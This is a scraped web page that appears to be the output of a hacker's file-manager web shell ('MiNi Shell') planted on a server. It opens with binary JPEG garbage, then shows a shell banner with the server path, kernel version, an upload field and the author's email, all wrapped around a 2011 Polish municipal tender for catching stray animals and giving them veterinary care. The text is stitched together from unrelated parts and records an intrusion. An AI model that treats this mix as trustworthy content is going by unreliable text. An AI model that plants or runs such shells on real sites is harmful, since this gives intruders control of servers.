JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111229/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111229/347979-N-2011.html

<p class="kh_header"><b>Choszczno: Wyłapywanie i utrzymywanie pod opieką weterynaryjną bezdomnych zwierząt z terenu Gminy Choszczno w roku 2012</b><br>
<b>Numer ogłoszenia: 347979 - 2011; data zamieszczenia: 29.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Choszczno , ul. Wolności 24, 73-200 Choszczno, woj. zachodniopomorskie, tel. 095 7659300, faks 095 7659306.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.choszczno.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wyłapywanie i utrzymywanie pod opieką weterynaryjną bezdomnych zwierząt z terenu Gminy Choszczno w roku 2012.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I. Przedmiotem niniejszego zamówienia jest: wyłapywanie w sposób humanitarny zagubionych, zabłąkanych  i porzuconych lub z innych przyczyn bezdomnych zwierząt,  z terenu gminy Choszczno oraz ich transport do schroniska (w miejscowości, w której Wykonawca będzie sprawował opiekę nad bezdomnymi zwierzętami).
II.  Wykonawca zobowiązany jest w szczególności do:
1.	Poszukiwania opiekunów dla zwierząt i przekazywanie do adopcji osobom zainteresowanym ich posiadaniem,  zdolnym  zapewnić  im  należyte  warunki bytowe;
2.	Prowadzenia ewidencji przyjmowanych pod opiekę bezdomnych  zwierząt  z  terenu  Gminy Choszczno;
3.	Wyłapywanie bezdomnych zwierząt oraz ich transport do schroniska niezwłocznie po otrzymaniu zgłoszenia od Zamawiającego, w  sposób bezpieczny, środkami które nie powodują  zagrożenia zdrowia  i  życia  zwierząt;
4.	W przypadku zgłoszeń dotyczących wyłapywania bezdomnych zwierząt agresywnych lub zwierząt rannych w wypadkach komunikacyjnych reakcja na zgłoszenie winna nastąpić w ciągu godziny od momentu przyjęcia zgłoszenia od Zamawiającego, w pozostałych przypadkach w dniu przyjęcia takiego zgłoszenia;
5.	Zapewnienie zwierzętom w schronisku właściwej opieki oraz właściwego traktowania i odżywiania, polegającej na zapewnieniu zwierzętom właściwych warunków sanitarnych i bytowych: pomieszczeń lub boksów, chroniących je przed zimnem, upałami i opadami atmosferycznymi, z dostępem światła dziennego, umożliwiającego zwierzętom swobodne poruszanie się, odpowiedniej karmy i stałego dostępu do wody zdatnej do picia;
6.	Zapewnienie wyłapanym i przetrzymywanym w schronisku zwierzętom kompleksowej opieki weterynaryjnej. Wykonanie usług weterynaryjnych zgodnie z obowiązującymi przepisami weterynaryjnymi, a w szczególności wykonanie wymaganych szczepień ochronnych, odrobaczeń, odkleszczeń, odpchleń, przeprowadzenie kastracji lub sterylizacji, uśpienie ślepego miotu. Świadczenie usług weterynaryjnych dla zwierząt poszkodowanych bądź chorych, rokujących nadzieję na wyzdrowienie, a w przypadkach koniecznych zapewnienie kwarantanny i odpowiedniego leczenia.  W sytuacji padnięcia zwierzęcia - należy odnotować  to w kartotece, podając datę i przyczynę padnięcia; 
7.	Usypianie zwierząt w przypadku wystąpienia takiej konieczności;
8.	Pod pojęciem leczenie należy rozumieć leczenie chorych zwierząt w przypadkach i zakresie określonym przez  lekarza weterynarii;
9. Realizując przedmiot zamówienia wybrany Wykonawca zobowiązuje się do jego wykonania w sposób zgodny z obowiązującymi przepisami prawa oraz wymogami określonymi we właściwych rozporządzeniach wydanych na podstawie obowiązujących ustaw oraz zaleceń urzędowego lekarza weterynarii
10.Szacunkowa ilość psów przebywających w schronisku w ciągu miesiąca - ok. 32 sztuk
11. Szacunkowa ilość przyjęć zwierząt do schroniska wraz z wykonaniem niezbędnych zabiegów weterynaryjnych w ciągu roku - ok. 30 sztuk
12. Szacunkowa ilość wykonania sterylizacji lub kastracji w ciągu roku - ok. 30 sztuk
13. Szacunkowa ilość godzin przeznaczonych na wyłapanie bezdomnych psów z terenu Gminy Choszczno - ok. 60 godzin  rocznie..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwości udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 ustawy do wysokości 50% wartości zamówienia podstawowego i polegającego na powtórzeniu tego samego rodzaju zamówień. Zakres zamówień uzupełniających będzie obejmował wszystkie usługi wyszczególnione w umowie podstawowej z Wykonawcą wyłonionym w przetargu nieograniczonym.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 85.20.00.00-1, 98.38.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.Warunek ten zostanie spełniony, jeżeli Wykonawca przedstawi dokumenty potwierdzające posiadanie aktualnego zezwolenia na prowadzenie działalności gospodarczej w zakresie  prowadzenia schronisk dla bezdomnych zwierząt udzielonego w drodze decyzji przez wójta, burmistrza lub prezydenta miasta właściwego ze względu na miejsce świadczenia usług - zgodnie z art. 7 ust. 1 pkt 4 
ustawy z dnia 13 września 1996 o utrzymaniu czystości  i porządku   w gminach (Dz. U. z 2005 r. Nr 236, poz. 2008 ze zm.).
2.  Ocena spełnienia warunków udziału w postępowaniu o zamówienie publiczne dokonana zostanie na podstawie załączonych przez Wykonawców do oferty dokumentów i oświadczeń, z treści których wynikają informacje potwierdzające spełnianie warunków.
3. oferty Wykonawców, którzy przedłożą dokumenty i oświadczenia potwierdzające spełnianie wymaganych warunków zostaną dopuszczone do badania i oceny
4. Zamawiający dokona oceny spełniania wymaganych warunków na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponować wykwalifikowanymi osobami, które będą wykonywać zamówienie lub będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usługi, wraz z informacją na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnego do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności  oraz informację o podstawie do dysponowania tymi osobami - w tym minimum 1 lekarza weterynarii oraz 2 pielęgniarzy zwierząt przeszkolonych w zakresie postępowania ze zwierzętami oraz przepisów o ochronie zwierząt.
2.  Ocena spełnienia warunków udziału w postępowaniu o zamówienie publiczne dokonana zostanie na podstawie załączonych przez Wykonawców do oferty dokumentów i oświadczeń, z treści których wynikają informacje potwierdzające spełnianie warunków.
3. oferty Wykonawców, którzy przedłożą dokumenty i oświadczenia potwierdzające spełnianie wymaganych warunków zostaną dopuszczone do badania i oceny
4. Zamawiający dokona oceny spełniania wymaganych warunków na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Na ofertę składają się:
a. pełnomocnictwo, o ile takie zostało udzielone, dla osoby podpisującej ofertę w imieniu Wykonawcy, jeżeli upoważnienie osoby podpisującej nie wynika wprost z dokumentów rejestracyjnych firmy (odpisu z właściwego rejestru, zaświadczenia o wpisie do ewidencji działalności gospodarczej albo umowy spółki cywilnej); 
b. wymagane przez Zamawiającego dokumenty wymienione w rozdziale VI niniejszej specyfikacji 
c. wypełniony formularz oferty cenowej  - wg wzoru stanowiącego Załącznik nr 1 do SIWZ,
d. oświadczenia o spełnianiu warunków udziału w postępowaniu -  wg wzoru stanowiącego Załączniki nr 2 do SIWZ,
e. oświadczenia o braku podstaw do wykluczenia -  wg wzoru stanowiącego Załączniki nr 3 do SIWZ,
f. wzór umowy - wg wzoru stanowiącego Załącznik nr 5 do SIWZ,
g. wykaz osób, które będą uczestniczyć w wykonaniu zamówienia - wg wzoru stanowiącego Załącznik nr 4 do SIWZ,
pisemne zobowiązanie innych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
Dokument składa ten Wykonawca, który w wykazie osób wskazał osoby, którymi będzie dysponował na podstawie pisemnego zobowiązania innych podmiotów.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany umowy w zakresie: jeśli zmiana stawki podatku VAT będzie  powodować  zwiększenie  kosztów wykonania  po stronie  Wykonawcy, Zamawiający  dopuszcza  możliwość zwiększenia  wynagrodzenia o kwotę równą różnicy  w kwocie  podatku  VAT  zapłaconego  przez  Wykonawcę,  jeśli  zmiana  stawki VAT  będzie powodować zmniejszenie  kosztów wykonania  umowy  po stronie Wykonawcy, Zamawiający  przewiduje  możliwość  zmniejszenia  wynagrodzenia o kwotę stanowiącą różnicę  kwoty podatku  VAT  do zapłacenia  przez  Wykonawcę,  rezygnacja  przez  Zamawiającego z realizacji części przedmiotu umowy - w takim przypadku  wynagrodzenie  przysługuje  Wykonawcy  zostanie  pomniejszone, przy czym  Zamawiający  zapłaci za wszystkie  spełnione świadczenia  oraz udokumentowane koszty,  które Wykonawca poniósł w związku z wynikającymi z umowy planowanymi  świadczeniami,  dostosowanie treści umowy do aktualnego stanu prawnego, jeżeli zgodnie z wprowadzanymi aktami prawnymi będzie to konieczne,  jeżeli Zamawiający dokonał zmiany sposobu wykonania części przedmiotu umowy, czego nie można było przewidzieć, ani też nie wynikało to z potrzeby wykonywania zamówienia  i nie można było tego przewidzieć przed zawarciem umowy.
Pozostałe zmiany to: aktualizacja danych Wykonawcy i Zamawiającego poprzez: zmianę nazwy firmy, zmianę adresu siedziby, zmianę formy prawnej itp., zmiana zakresu umowy wynikająca  ze zmiany przepisów, norm lub normatywów mających zastosowanie do przedmiotu umowy, lub tych zmian dokona Zamawiający,
zmiana terminów realizacji zamówienia z przyczyn niezależnych od Wykonawcy lub Zamawiającego, które to przyczyny każda ze stron musi udokumentować,
Wykonawca może dokonywać zmiany wykwalifikowanych osób, które będą wykonywać zamówienie lub będą uczestniczyć w wykonywaniu zamówienia, przedstawionych  w ofercie, jedynie za uprzednią pisemną zgodą Zamawiającego,
Wykonawca z własnej inicjatywy proponuje zmianę wykwalifikowanych osób, które będą wykonywać zamówienie lub będą uczestniczyć w wykonywaniu zamówienia w następujących przypadkach: a - śmierci, choroby lub zdarzeń losowych ww. osób,
b - nie wywiązywania się ww. osób z obowiązków wynikających z umowy,
 jeżeli zmiana wykwalifikowanych osób, które będą wykonywać zamówienie lub będą uczestniczyć w wykonywaniu zamówienia stanie się konieczna z jakichkolwiek innych przyczyn niezależnych od Wykonawcy ,np. rezygnacji itp.,
 Zamawiający może zażądać od Wykonawcy zmiany wykwalifikowanych osób, które będą wykonywać zamówienie lub będą uczestniczyć w wykonywaniu zamówienia, jeżeli uzna, że osoby te nie wykonują swoich obowiązków wynikających z umowy. Wykonawca obowiązany jest zmienić  ww. osoby zgodnie z żądaniem Zamawiającego w terminie wskazanym we wniosku Zamawiającego, 
W przypadku zmiany wykwalifikowanych osób, które będą wykonywać zamówienie lub będą uczestniczyć w wykonywaniu zamówienia  nowe osoby muszą spełniać wymagania określone dla danej osoby posiadającej wymagane przez zamawiającego kwalifikacje do wykonania przedmiotu zamówienia. Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.choszczno.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ wraz z załącznikami w wersji papierowej można odebrać w siedzibie Zamawiającego za opłatą,koszty ksero, pok. Nr 25..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.01.2012 godzina 10:00, miejsce: Siedziba Zamawiającego - Gmina Choszczno, Urząd Miejski w Choszcznie, ul. Wolności 24, 73-200 Choszczno - kancelaria ogólna - parter przy wejściu głównym..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com